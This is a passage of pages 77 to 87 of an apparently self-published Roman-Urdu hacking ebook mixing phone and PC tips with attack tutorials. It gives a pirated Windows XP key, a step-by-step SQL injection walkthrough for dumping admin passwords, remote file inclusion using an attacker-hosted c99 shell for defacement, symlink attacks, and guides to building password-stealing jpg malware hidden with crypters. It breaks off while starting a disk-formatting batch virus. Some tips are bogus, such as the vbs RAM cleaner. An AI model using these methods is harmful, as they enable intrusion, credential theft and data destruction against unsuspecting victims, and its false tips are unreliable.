Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree SMS@Rs.3.99, SMS SUB to 605. Daily U to U Pack: 500 SMS@Rs.2, SMS SUB to 611. Daily Night Pack(12am-8am): 300 SMS@Re.1, SMS SUB to 60935) Use Google via SmS on ur Mobile: There are 4 steps for using google via sms, 1.Goto www.google.com 2.Click on ACCOUNT SETTING 3.Enter ur m0b number here,u will get a spicial code here 4.Now Enter this Code into verification Tab & Enjoy Go00ogle via SMs.36) Tinyurl.com/idman6-0-7 Cracked Idm ver 6.0.7 final download link. 37) Now you can create your own desire of picture sms just download "PHOTO SMS" Download from http://t.co/e25U3bZv 38)FACEBOOK ko ALL NETWORKS se FREE use krnay ka METHOD. 1. Open: www.sendsms.pk 2. Account bnayen. 3. Account / ID Login karain. 4. Left side pr FACEBOOK name k Link ko Open kro. 5. Nichay ek Link "Connect With FaceBook" pr Click karain. 6. Next Page pr apni FaceBook ID Open kro. 7. Accept / Authorise kro. Mukamal ho gaya. Ab ap MSG aesay likha kro. FB urMSG 39) notepad open karo aur likho mystring=(80000000) aur is file ko desktop pe is name se save karo ram.vbs ab is pe duble click kar ke speed cheak karo 40) Awesome Blogger template 4 u all. Google loves this template, Full SEO optimized. Demo: mtahirzahid.blogspot.comIs blog me 50 posts hen or google me 200+ links indexed hen blog k. Thats y i love this template. Gift 4 u all, download: Http://tinyurl.com/theme4u Enjoy...41) Best funy google tricks. main ap frnds k 7 google ki kuch funniest tricks shar kr rha hn i hope k ap ko pasand aae. 1:Meaning Of Search 4 Google. -goto google.com -type SEARCG in search box -pres I'm Feeling Lucky button 42) photo editing sites: http://t.co/JEqifNy9 http://t.co/dMxkHL6 i http://t.co/LJWeU1q8 http://t.co/69RSrY5R 43) download (Mobile Number Locator) apnay mobile me install karein aor kisi bhi mobile ki location check karein. 44) 20 tips of website page rank: http://t.co/SMuY9MDY 45) http://t.co/r3H6OrVW http://t.co/r5CtB5mg for mobiles & balance + hacking i.t 46) Microsoft forum hacked: http://t.co/xQuNvQlJ 47) google+ pages promotion policy is even more restrictive than facebook's : http://t.co/0SvYoXmM 48) is software sy ap kisi ki bhi call sun saktay hn, "CallCheater" download from: http://t.co/lMswst36 it work in nokia few & old mobiles.49) team viewer download : myurl.pk/BFbog 50) facebook apps links: apps.facebook.com/top-tenz/ apps.facebook.com/myfootteam/ http:/apps.facebook.com/fungiftsbox/s 51) hacking course: http://t.co/WAFllBM www.hack.co.za www.rootabega.org www.rootshell.com www.www.insecure.org/sploits.html for latest updates.52) hidden windows programs for designing icons and characters type: (eudcedit) in run and pres enter, 53) Must visit and register there http://bit.ly/shmHtJ 54) in websites k madad sy ap facebook status update kar saktay hain: www.earthsms.net www.sendsms.pk www.freesmscraze.com www.mobi2weet.com 55) trace mobile numbers: www.cellpoint.co.in/mtrace.php easily trace nmbers & get details.56) free download avast internet security 6 for 9 months giveaway: http://bit.ly/p5psO0 www.pakmobile.tk (tahir blog57) Ufone 3113 par Help Likh kar Send karay. Or Bohout Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 77
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Sare Servss Free activate karay. E.g apni pasnd ka Numbr, call block etc 58) If you want to make partition of hard disk without formating or data losing thdn use this software "PowerQuest's Partition Magic"59) For Tips and Hacking,iT,FREE SMS NET And Free Balance ky liay http://t.co/r3H6OrVW ya http://t.co/r5CtB5mg for mobile. 60) In Sites Pe Name k Fancy& Animated Logo Bna kr download karin. www.Textspace.net www.Flamingtext.com www.Cooltext.com www.Sparklee.com 61) Delete an Undeleteable file: open cmd, Open tsk Managr, Go 2 Processes, end Explorer.exe, then in cmd type 'del <filepath>' and Press Enter 62) 8 Ways To Grow Your List (Email Marketing) http://t.co/aNzWbYfY 63) Window xp Professional Genuine Key. JT4C7-CYT8T-HXDG7-PVTG4-T7JYD. Installation Ke Waqt Yeh Key Dain Aapki Window Genuine. 64) To create a user account in DOS command, type "Net User Global /add" and hit enter. user account "Global" will b created. 65) 2nd Pakistan Blog Awards Announced http://t.co/Jpt59Qu4 66) If any page is missing download this lecture in the form of PDF book from here.Www.tinyurl.com/legendtut 67) 10 GB Free File Storage http://t.co/oXEcNkyM Backup Files, Photos, Music & More High Security, Easy Sharing. 67) Hidden Bluethoot In XP:Run Command Type"fsquirt" Without Quotes Now Just Select Whether U Want 2 Send Receive Any File Very Easy.68): When a window is active, press the F11 key of the keyboard to get the biggest window possible and press F11 again to restore it.69): FOR COMPUTER GAMES these softwares must be required 1).DIRECTx 2).DIRECTX 9.0 (3d acceleration) 3).OpenAL 4).NEVIDIAx 5).NEVIDIAx 9.1 First INAvEeD.U.S: c0mputer tip by me!!! If ur Pc G0t m0re "VIRUS" So t0 instaal this S0ftware. AVIRA Debuger v.5x Series t0 Be set ur Pc's VIRUSES. Come with nstall this five softwares then install the Game.70): Nokia. agar k mobile ya memory card me virus ajy to.Tantion na ly. virus khatm krne k lye code *#7370# *#7470# *#7979# kry71): Boost your computer speed. This software increase your computer speed. For Games graphics and internet speed up. www.4shared.com/file/iXgj0947796272): Clean ur RAM and Make ur Computer fast.. Open notepad and type FreeMem=Space(128000000) and save it as RAMcleaner.vbs and run it.73): Agr mobil kisi Shop pr sale kro to sath MemoryCard sale na krna, Q k us main aap nay Family Photos aur Personal Data agr Delete b kr diya hy to wo sub kuch (Data Recovery) Software k zriye wapis aa jata hy. Aur yehi Family Photos & Video baaz Eman-Frosh Log InterNet pr UpLoad kartay hen.jo mob k zariye logo tk phonch jatay hn.Mobile Scandel isi waja se banty hen aur buhat sy sharif log bila waja bdnam hojaty hn.74): Speed Up PC Start>Run> "Rundll32.exe advapi32.dll, ProcessIdleTasks" & press Ok. System will end all idle processes! ENJOY75): Agr apko computer main urdu word ya aur kese symble ki zarorat ho to goto start=> run type:"charmap" Hit Enter. Enjoy. 76): PC Window Xp Professional Orgnal Key JT4C7CYT8T-HXDG7-PVTG4-T7JYD. 78): FRNDS AB JIN K CMPUTER MAI 3D CARD NAI HAI WO B 3D GAMES KHAIL SKTAI HAN EXMPLE GTA SAN,NFS MW,ETC BUS GOOGLE MAI JA KR VIRTUAL 3D ANALYSI DOWNLOD KARO OR GAME KI EXE FILE KO US SOFTWARE K SATH OPEN KARO OR ENJOY KARO. Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 78
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
HACKING METHODS *Hacking* 1. Arbitary File Deletion2. Code Execution.3. Cookie Manipulation4. CRLF Injection5. Cross Frame Scripting (XFS)6. Cross Site Scripting (xss)7. Directory Traversal8. Email Injection.9. File inclusion.10. Full path Disclosure.11. LDAP injection.12. PHP code Injection13. Remote XsL inclusion.14. SSI injection15. SQL injection16. URL Redirection17. xPath Injection.18. CSRF 19. LFI20. RFI Hack Tutrial:-
HACK WEBSITE THROUGH SQLI How to Hack any Site by Sql Injection? Sub se pehle Google.co.in open karen. Wahan ye dork likhen: inurl:.php?id= Phir left side par Pages from India par click kar den. Aap k paas Indian Sites aa jayengi. Ab kisi bhi link ko open karen. Site kuch aisi hogi: Www.Site.com/index.php?id=5 Lets see thats its Vulnerable or not. Type ' after id=5 The site will be like this: Www.Site.com/index.php?id=5' If it gives error, It means its Vulnerable to Hack. Ab is k Columns find karen. id=5 order by 1-id=5 order by 2-Isi tarah numbers barhate rahen jab tak error na aa jaye. For example, Agar 6 par error aaya to is k 5 Columns hain. Now find valid Column to attack on Site. id=-5 union all select 1,2,3,4,5-Agar is ka 2nd Column valid ho to hum is Column k through database aur tables find karenge. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 79
Power Of HackingŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree Find its database version id=5 union all select 1,@@version,3,4,5-Agar is ka Database version 5 ho to hum easily tables maloom kar sakte hain. Agar 4 ho to humein table guess karna parrta hai. Table finding for version 5 id=5 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-Is se Site k tables aa jayenge. Hamein Admin ka data (Username,Pass) chahiye. Agar admin table tbl_admin etc ho to is ka Column find karenge id=5 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='tbl_admin' Is se admin table k columns aa jayenge. Like Username,Password etc. Now final step. Ab hum Admin data hasil karenge. Agar columns hon Admin, Password, Email to hum ye sub find karenge id=5 union all select 1,group§concat(Username,0x3a,Password,0x3a,Email) Aap k paas aapke kaam ki cheez aa jayegi. Yani Admin Id, Email aur Pass. Enjoy! Hack Tutrial:-Hack Forum Through MySql
Pehle kisi hosting site se domain len. Like byethost.com aur ek Mysql database bhi create karen. Phir filecrop.com se vbulletin script download karen aur extract karen. Bohot saare folders honge. Phir us mein upload folder mein jaen. Phir includes k folder mein config.php.new file ko search karen aur us ka naam change kar k config.php rakh den. Phir config.php ko wordpad par open karen aur database name find karen. Wahan har cheez by default hogi. Database ki jagah jo aapne Mysql database create kya hoga wo copy kar k paste kar den. Phir username ki jagah jahan root likha hoga wahan apni site ka username aur neechy password likhen jo aapne apni site ko banate waqt diya hai. Email id bhi change kar den. Note: Wahan par har cheez change kar k ' ' k beech mein likhni hai. Phir save kar den. Phir file uploading k liye filezilla download kar k install farma kar open karen. Us mein apni site ka ftp link host mein, username aur password dene k baad connect par click karen. Us mein phir right panel mein apni site ka htdoc folder open karen. Phir vbulletin k andar upload folder ki saari files ko select all kar k filezilla k sub se last section mein drag karen aur right click kar k Qeued Files par click karen. Wo upload hona shuru ho jayengi. Jab files upload ho jayen to http://yoursite.com/install/install.php open karen. Wahan par vbulletin intallation script aa jayega. Next karte jaen aur ghor se dekhte jayen. Phir aage BB title, Email id den aur next karen. Aur kisi cheez ko mat cherna hai. Phir aage Delete Install/Install.php Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 80
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree likha aayega. Apne site k htdoc folder se install.php aur init.php naam ki file ko delete karden. Init ya pata nahi dusri file thi. Naam yaad nahi aa raha. Install.php k upper ya neeche hogi.Phir here par click karen. Aage Username aur Password likh kar log inkar den. Aap k saamne Cpanel aa jayega. And ur forum is ready to use. Hack Tutrial:CHANG MY IP EASY METHOD AJ MAI APKO IP CHANGE KARNAY KA AIK AASAN TREAKA BATANAY JA RAHA HUNN .. APKO KARNA YAH HAI K RUN MAIN JA KAR CMD LIKHAIN AUR USS K BAD YAH COMMAND LIKH KAR ENTER KAR DAIN . IPCONFIG/RENEW AB AAP APNA NEW IP LIKHEIN ....
NOTE: YAD
RAKHAIN K YAHCOMMAND LIKHNAY SAY PEHLAY APNA INTERNET CONNECTION DISCONNECT KR LAIN ,
AGAR APNAY YAH COMMAND INTERNET USE KARNAY K DORAN LAGAYA TO YAH COMMAND WORK NAHIN KARAY GA.. WESAY YE BOHT EASY METHOD HY.. AGAR AAP KO KOI PROBLAM HO TO YA KOI SOFTWARE IP HIDDER USE KARNA CHAHEIN TO PHIR AP KO KAAFI SOFTWARE MIL JAEIN GAY ... KUCH DOST BLOCKED SITES KO OPEN KARNAY K LIYE HOTSPOT SHIELD & IP HIDDER USE KARTAY HAIN TO UN K LIYE 1 SUGGESTION YE HY K WO APNAY BROWSER ME STEALTHY ADD -ON USE KAREIN . IS SAY AAP KA IP BHI CHANGE HO JAYE GA & BLOCKED SITES BHI OPEN HO JAEIN GI ... Hack Tutrial:Straight-Through and Cross-Over cables Straight-Through Cabling
CAT 5 UTP cabling usually uses only four wires when sending and receiving information on the network. The four wires, which are used, are wires 1, 2, 3, and 6. When you configure the wire for the same pin at either end of the cable, this is known as a straight-through cable. Cross-Over Cabling
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 81
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
If we use want to connect two computers together with a straightthrough cable, we can see that, the transmit pins will be connected to transmit pins and receive pins will be connected to receive pins. We will not be able to connect two computers or two hubs together using straight through cables. Hack Tutrial:SYMLINK IN URDU A little info abt symlink.Symlink hacking mai buhat kam ke chez h. Is se ap web ka pura data base download kar saktae ho aur hack b. Symlink mean similar link.Ye chez linux operating system ne nikali the.Jo log ubunto,fodora ya linux use kartae h unko pta hoga.Symlink tora folder shortcut ke trha hota h.Ap ubunto ma simple foldr pr right click kr k symlink pr click krn ge to ek new foldr bn jaiga symlink ka Basic different symlink aur folder shortcut mai path ka h.Folder shortcut mai path wohe i ga jo real folder ka h.Lekin symlink ma path kuch alag hoga Symlink ka path alag hone k wja se ap ek chez ko alag alg jga se cnnect or use kry ho.Example ek portable hardisk k symlink bnai or ek mobil connectivity ma dal dia ek local_root ma etc.Is se portable hardisk ke speed pr frq ni pryga.Symlink alag path jo bnai ga sb k Alag path hnge par excess same chez hoge. . . Path alag hone ke waja se jo chez par parword ya koi restriction lage ho k ap nh khol saktae.Agar us ka symlink bnaya jai tou wo file khul jai ge. Nw yae symlink ke info the nw use off symlink in hacking. Hr web ek computer se chlti h called server.Us server pr hr web ka folder hota h jis ma web ki sari file wagaira save hoti hn.Sirf kuch file ko public rights diye jaty hn.Baki files ko koi nhi chhaer skta admin k ilawa Qk wo public nh.Jb b file open hoti h server check krta h link path k ye file kon khol skta h.Nw hr web folder ma usky pasword b save hnge.Pura data base save hoga.Agr data base download kr leya jai tou web hack Nw ap web ka data base download karne k leyae web k folder ka symlink bnao ge.Waise wo folder khul nh sakta.Lekin ku k symlink mai path alag, magar excess same chez hoti h tou ap data base ka symlink bna kar wo folder khol loge.And finishd ur victim. Symlink bnane k leye apko shell chahye hoga uploaded kisi web pr.Shell jis web pr Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 82
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree uplood hoga us web pr ap changes kr skte ho.Nw jis server pr apka shell wali web h us server pr apna victim dhundo.Then shell se symlink bnao server pr apne victim k data base ka.Or ghus jao data base ma. Symlink bnane k leye kuch code use hoty hn jo exploit kehlaty hn.Kafi ache exploit mil jaege pr jo boht ache hoty hn wo privat hoty hn log share ni krty Symlink ka advantage ye hua k frz krn ek web hack krna muskil h par jis server pr web h usi server ki dusri web hack kr k ap symlink apne victim ka bna kr uske tyt security b zero krdo.Matlb kise b server ke ek web hack krli jai tou kafi chance h ap us server k dusri web b hack kr skty ho by symlink Symlink sirf ek link bnata h jo apko web ka data base wagaira asani se excess dai ga.Acha symlink server par bnta h.Aur server par kuch karne k leyae apko shell chayae. Shell ap koi b bikar web hack kar k upload kardo. Simple words ap ek server ke koi b ek web hack kar k dusri un hackable web hack kr skty ho. Hack Tutrial:RFI WEB ACCESS HACKING
RFI Vulnerable sites ko serch krne k lie gogle me Rfi dorks likho.Phr jo sites ayegi wo kuch is trah hogi Www.site.com/index.php?action= Us site ki vul search karne k liye=sign k aagy Www.google.com likhen. Phir url kuch aisi banegi: www.abc.com/index.php?action=www.google.com Is url se agr google ka main page khulta ha to ye site Rfi vul ha Phir ye krna hai k kisi webhosting like t35.com ya 110mb.com pe c99 ya r75 shell upload kren. Ab ye karen k site mein jaha aapne Google ka link dia tha, Waha ab apne shell ka link den. Is se site is tarah hojaegi: Www.abc.com/index.php?action=www.yourt35site.com/c99shell.php? Shell ka link php tak hai, Us k baad aapne ? lagana hai warna is k baghair shell execute nahi hoga Phir aapki control hogi us site pe. Jo bhi krna hai karen. Contents del marden ya apna deface page upload kren. ------Finish---Hack Tutrial:Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 83
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree GET FREE SHELL FOR HACKING
You can get free shells 4rm these sites. cyberspace.org Grex.org Nxy.net Shellyeah.org Hobbiton.org Freeshells.net Ductape.net Free.net.pl xox.pl Iprotection.com Coronus.com Odd.org Marmoset.net Flame.org Freeshells.net.pk Linuxshell.org Takiweb.com Rootshell.be Hack Tutrial:VBULLETIN BASIC
Pehly kisi Hosting Site se domain len. Like www.byethost.com aur ik Mysql database bhi Create karen. Phir www.Filecrop.com se Vbulletin Script download karen aur extract karen. Boht saary Folders honge. Phir us mein Upload Folder mein jaen. Phir Includes k Folder mein config.php.new file ko Search karen aur us ka naam Change kar k config.php rakh den. Phir config.php ko Wordpad par Open karen aur Database Name Find karen. Wahan har cheez by default hogi. Database ki jagah jo aapne Mysql database Create kya hoga wo Copy kar k Paste kar den. Phir Username ki jagah jahan Root likha hoga wahan apni Site ka Username aur neechy Password likhen jo Aap ne apni Site ko banate waqt diya hai. Email ID bhi Change kar den. Note: Wahan par har cheez Change kar k ' ' k beech mein likhni hai. Phir Save kar den. Phir File Uploading k liye Filezilla Download kar k Install farma kar Open karen. Us mein apni Site ka ftp Link Host mein, Username aur Password dene k baad Connect par Click karen. Us mein phir Right Panel mein apni Site ka htdoc Folder Open karen. Phir Vbulletin k andar Upload Folder ki saari Files ko Select All kar k www.Filezilla.com k sub se Last Section mein drag karen aur Right Click kar k Qeued Files par Click karen. Wo Upload hona shuru ho Jayengi. Jab Files Upload ho Jayen to http://yoursite.com/install/install.php Open karen. Wahan par Vbulletin Intallation Script aa jayega. Next karte jaen aur ghor se dekhte jayen. Phir aage BB Title, Email ID den aur Next karen. Aur kisi cheez ko mat cherna hai. Phir aage Delete Install/Install.php likha aayega. Apne Site k htdoc Folder se Install.php aur init.php naam ki File ko delete karden. Init ya pata nahi dusri File thi. Naam yaad nahi aa raha. Install.php k upper ya neeche hogi. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 84
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Phir here par Click karen. Aage Username aur Password likh kar log in kar den. Aap k saamne Cpanel aa jayega. And ur Forum is Ready to Use. ------Finish------==================== Vbuluten 3.8 and 4.1 ki scripts jin ko chahye wo www.mshqit.com ko visit kre..==================== Hack Tutrial:LEARN HACKING BASIC KNOWLEDGE NOOB KA MATLAB HOTA HAI JO HACKIN NEW SEEKH RAHA HO. VICTOM USEY BOLTE HAIN JO HAMARA TARGET HO . VULNERABILITY KA MATLAB HOTA HAI HACKABLE MATLAB HACK HO SAKE TO USEY VUL. KEHTE HAIN . PROFFESIONAL HACKER USEY BOLTE HAIN JO HACKING KE AIK AIK CHEZ SE WAQIF HO . JESE HUM KOI KAAM KARTE HAIN TO US KA KAAM HACKING HOTA HAI . YE THI KUCH INFO . 'DORK' YEH SITE HACK KARTE HUE AKSR USE HOTA HAI. YEH AIK COMMAND HOTI HAI JO GOOGLE MAIN RAKHNI PARTI HAI WO COMMAND RAKHNE SE GOOLE HAMEN HACKABLE SITES DHOND KE DETA HAI OR HUM US SITE PER METHOD LAGA K SITE KO HACK KR DETE HAIN. DORK KUCH IS TARAH KA H0TA AI INURL :/ ADMIN_LOGIN. ASP HR MEDTOD KA APNA DORK
'KEYLOGGER YEH AIK HACKNG TOOL KA NAAM HAI . IS SE EMAIL HACK HOTI HAI. IS 1 FILE BANTI HAI , OR WO FILE APNE VICTOM KO KISI TRIQE SE SEND KAR DEN JUB WO
HOTA HAI SE
OPEN KARE GA TO WO JIS JIS SITE PER LOIN HO GA USKA KA SARA DATA RECORD HO KE AP
1. ARDAMAX 2. SPYNET . YEH SITES HACKING METH 0TZ KE NAAM HAIN . 1. ARBITARY F ILE DELETION 2. C ODE EXECUTION .3. C OOKIE MANIPULATION 4. CRLF INJECTION5. CROSS FRAME SCRIPTING (XFS)6. CROSS SITE SCRIPTING (XSS)7. DIRECTORY TRAVERSAL8. EMAIL INJECTION .9. FILE INCLUSION .10. FULL PATH DISCLOSURE.11. LDAP INJECTION.12. PHP CODE INJECTION13. REMOTE XSL INCLUSION .14. SSI INJECTION 15. SQL INJECTION 16. URL REDIRECTION 17. X PATH INJECTION . 18. CSRF=0 WHAT IS CRYPTER? AKSAR HUM VICTOM KE PC , YA ID KO HACK KARNE KE LIYE USEY KOI FILE BHEJTE HAIN , TAA KE WO OPEN KARE PER HAMEN YEH B PATA HONE CAHIYE WO FILE VIRUS HOTI HAI OR AGAR USKE PAS ANTIVIRUS HUA TO VO FILE PAKRI JAE GI? MMMM TO ? TO CRYPTER MAIN WO VIRUS WALI KE PAS AATA RAHE GA. SUB SE ACHE KEYLOGGER
FILE GUZARO AND PHIR VIRUS HIDDEN HO JAYE GN VICTOM KO BHEJ DEN WO FILE PHIR USKA ANTIVIRUS US FILE KO NI PAKR SAKE GA .OKZ ISTEALER YEH AIK HACKIN TOOL HAI. JIS SE EMAIL HACK KI JATI HAIN . ISLTEALER SE AIK SETUP JESI FILE BANTI HAI JO VICTOM KO BHEJ DEN JUB WO OPEN KARE GA TO US KE PC MAIN JITNE LOGIN HOYE KHARE PWD HON GEN WO HAMARE PAS AND WO SETUP FILE KO OPEN KRNE K BAAD MAIN B JITNE LOGIN HON GEN WO B HMARE PAX US KA PC BHEJTA RAHE GA. ZINDAGI RAHI TO SHARE KARUN GA LECTURE .
HACKING KE 90 PERCENT TOOL VIRUS HOTE HAIN INHEN ANTIVIRUS DETECT K ARTA HAI HITMAN UNCLE B 0LTA HAI KE AGAR HACKIN KARNI HA TO APNA ANTIVIRUS UTHA KE PHAINK DO . OKZ . OR AP GHOST SETUP BANA LEN JIS KA LEC . HO CHUKA HAI . JO KE HACKERS K LIYE 1 QEMTI TOHFA HAI . JIS KO CHAHIYE GHOST KA LEC . MERE SE LE LEY . OK'Z. F OR HACKING A WEB U WILL NEED . 1. SQL HELPER V 2.7 2. EXPLOIT SCANNER 3. HAVIJ FOR ADMIN FINDER AND MD5 4. DORKS THERE R 5 METHODS OF HACKING EMAIL IDS: F AKE L OGIN PAGES- COOKIE STEALING- SOCIAL ENGINEERING- BRUTE FORCING- TROJANS OR KEYLOGGERS . AND ONCE MORE U CAN ASK THE PASWRD FRM THE OWNR OF THAT ID ! COMMON WEB HACKING METHODS. 1. CROSS SITE SCRIPTING (XSS) 2. CROSS S ITE REQUEST FORGERY (CSRF) 3. CLICK JACKING 4. GIFAR 5. URL F RAM INJECTION 6. SQL INJECTION 7. L OCAL FILE INCLUSION (LFI) 8. REMOTE FILE INCLUSION (RFI) SHELLS WEBSITE K LYE BACKD00R H0TE HEN, JO SMJHO EK CPANEL KA KAAM KRTA HA .. BUT BH0T SE FEATURES H 0TE HEN DFRENT SHELX KE, R 57, Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 85
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree SYRIAN , W4CKING, C99, ITSEC SHELLS ARE MY FVRT ... WSE ME IP HIDE K LYE VPN AND AUTOHIDE IP USE KRTA HN JO HAR MINT K BAD IP CHANGE KRTA HA , WESE FAVOURITE T 00LS TO BH 0T HEN BUT HAVIJ AND MYSQL DUMPER BEST .. KEYLOGER KOI B UNDETECTABLE NAI HOTA ... P C-WWW.TIPSTRICKS.BLOGSPOT .COM MA JAO . UDHAR AIK TUTORIAL HAI... US'SE 16 ANTI VRSZ MA SE 13 K LIYE UNDETECTABLE HO JATA HAI C OMMON WEB HACKING METHODS. 1. C ROSS SITE SCRIPTING ( XSS) 2.
CROSS SITE REQUEST FORGERY (CSRF) 3. CLICK JACKING 4. GIFAR 5. URL FRAM INJECTION 6. SQL INJECTION 7. L OCAL FILE INCLUSION (LFI) 8. REMOTE FILE INCLUSION (RFI) ROXOR BRO PC KEYLOGER SE NAI TROJAN SE HACK KRTE HAIN . LOGER SE TO JST K EYBRD K KEY LOG HOTE HN OR PRNTSCREN LE SKTE HN ETC . OR TROJAN SE KAFI CONTROL AJATA HAI. IS WQTPRO RAT TROJAN HE ZYADA USE HONY WALA TROJAN HAI. TUTORIAL HITO K BLOG PE MIL JAI GA . FUNVIRUS.TK ====================WEB HACKING TRICK TRICK U CAN NW EDIT ANY WEBSITE ND DO UR DESIRE CHANGES IN THAT WEBSITE . 1ST OPEN ANY WEBSITE ND TYPE THE FOLLOWING IN ADRESS BAAR AND HIT ENTER . JAVASCRIPT :DOCUMENT .BODY .CONTENT EDITABLE ='TRUE'; DOCUMENT .DESIGN M ODE ='ON'; VOID 0 4MORE VISIT MTAHIRZAHID
==================== LEARN HACKING AND INTERNET SECURITY (ID HACKING , GOOGLE HACKING , WIFI HACKING , IP HACKING, KEYLOGGING ) E.T.C MTAHIRZAHID .BLOGSPOT .COM ==================== XSS TUNNELING: COMPLETE TUTORIAL WWW.FACEBOOK .COM/TOPIC .PHP =================== WASY HACKING KA EK METHOD JAVASCRIPT INJECTION BI HA OR AP CNTRL+ALT +DEL SAY JAVA PASS SAY PASS HO SAKTY HA . ==================== HOW TO INSTALL DOTNETNUKE 4.5 TO WINDOWS XP PRO WITH IIS VIDEO TUTORIAL , HOW TO INSTALL DOTNETNUKE 4.5 TO A BARE BONES INSTALLATION OF WINDOWS XP PROFESSIONAL. WWW.DNNCREATIVE.COM/ ==================== INTERNET PER KISI DUSRE KI WEBSITE BGHAIR US KI IJAZAT K ADMIN RIGHTS SE USE KRNA AUR US K PASWARD MALOOM KRNA HACKING KEHLATA HAI
HACKING BOHAT SE METHODS SE KI JA SKTI HAI. E.MAIL ID HACKING KE TARIQON KE NAAM YEH HAIN. FAKE LOGIN PAGES- COOKIE STEALING- SOCIAL ENGINEERING- BRUTE FORCING- TROJANS OR KEYLOGGERS-CRACKING FOR MSN HACKING DOWNLOAD (HOTMAILHACK FAQS V 1.0) OUR WINDOWS HACKING . (WIN HACKER 2.03) DOWNLOAD KARO.OUR (WIN SECURE) . YAHOO HACKING K LAHA DOWNLOAD (TROJAN MAKER)R(MPS) (BUS HACK) R (DEEP THROAT TROJAN).OR NET HACKING K LAHA (DOWNLOAD NET HACK 3.4.2)END ==================== AB HACKING SEKHIURDU MAIN , FREE HACKING SOFTWARE DOWNLOAD KAREN, HACKING SOFTWARE KEXE USE HOTE HAIN , SAFETY TIPS , HACKING RULES , HACKING H ELPFUL LINKS OR BHI BUHUT KUCH JANIYE HACKING KE BARE MAIN WO BHI SUB URDU MAIN VISIT KAREN WWW. SHERAZHACKZ .TK SHARE WITH YOUR FRIENDZ.THNX Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 86
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree ==================== ABBREVIATIONS (IIS) INTERNET INFORMATION SERVICES (PHP) PHP HYPERTEXT PREPROCESSOR (DNN) DOTNETNUKE KUCH ZORAR ABBREVITIATI0N JO LACTURE MEA USE H 0TY HN ==================== Hack Tutrial:HACK YAHOO E.MAIL WITH "MPS" SOFTWARE Mps Aik Aisa Software hai jis main apni marzi ki picture rakh den aur yeh software us picture ko aik virus main convert karne ke baad ap ki e.mail id mangta hai.aur jub file ban jati hai to jis ka password chahiye us ko send kar den jub wo us "jpg file" ko open kare ga us ka password ap ke paas aa jaye ga Method=>1- go to "mshqit.com" click email hacking and download mps.ab is software ko install karen.2- install hone ke baad is software ko open karen3- jub ap mps ko open karen gen to wahan buhut se option hon ge for example disable task , manager , disable regedit , disable cmd , send yahoon password waghaira.4- "Send YahoO Password" waley option per karen. Ab us se agley option main yeh software ap ki E.mail id mange ga to ap apni id likh den.6Ab Browse kar ke apne computer se aik picture select karen jis ka format "jpg" ho.7- Ab jpg picture ko koi bhi naam de den.8- Ab "Create Mps" per click kar den aur is file ko save kar den. is file ko ap ne open ni karna . ab yeh virus tayar ho aya aksar log isko send kar dete hain per is bar isko send mat karen balke hexoredition.tk per jayen or koi crypter download ke kren. crypter kya karta hai? crypter kisi bhi virus wali file ke virus ko chupa deta hai jis ki wajah se koi bhi antivirus us file ko pakar ni sakta.jub ap wo virus wali jpg file ko kici ache crypter main se guzaren gen to us file ko antivirus ni pakre ga jis ki wajah se victom ankhen band kr ke us file ko open kar le ga . Ab is file ko us E.mail id per send kar den jis ka password ap ko chahiye.10- Jisey ap ne "jpg file" bheji thi wo jub is file ko open kare ga to usi waqt us ka password ap ki E.Mail id per aa jaye ga.jpg file ko crypter mainse guzarna mat bolen. comments if yu like yahoo mps hack tip. Jb file crypter mn se guzar ln to cnfrm krne k lye www.virustotal.com pe upload krn, yeh site update h, agr yeh site kahe k jpg file infectd h to chnge ur crypter. DOWNLOAD(http://www.mediafire.com/download/u0infa76cs52qj2/ModLoaderMp+1. 0.0.zip ) ya (https://www.mediafire.com/?qnlzyowzymv ) Hack Tutrial:FORMATE HARDH DISK THROUGH BATCH VIRUS Here i m creating a batch virus which will format hdd @Echo off echo @echo off >c:?/show.bat Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 87
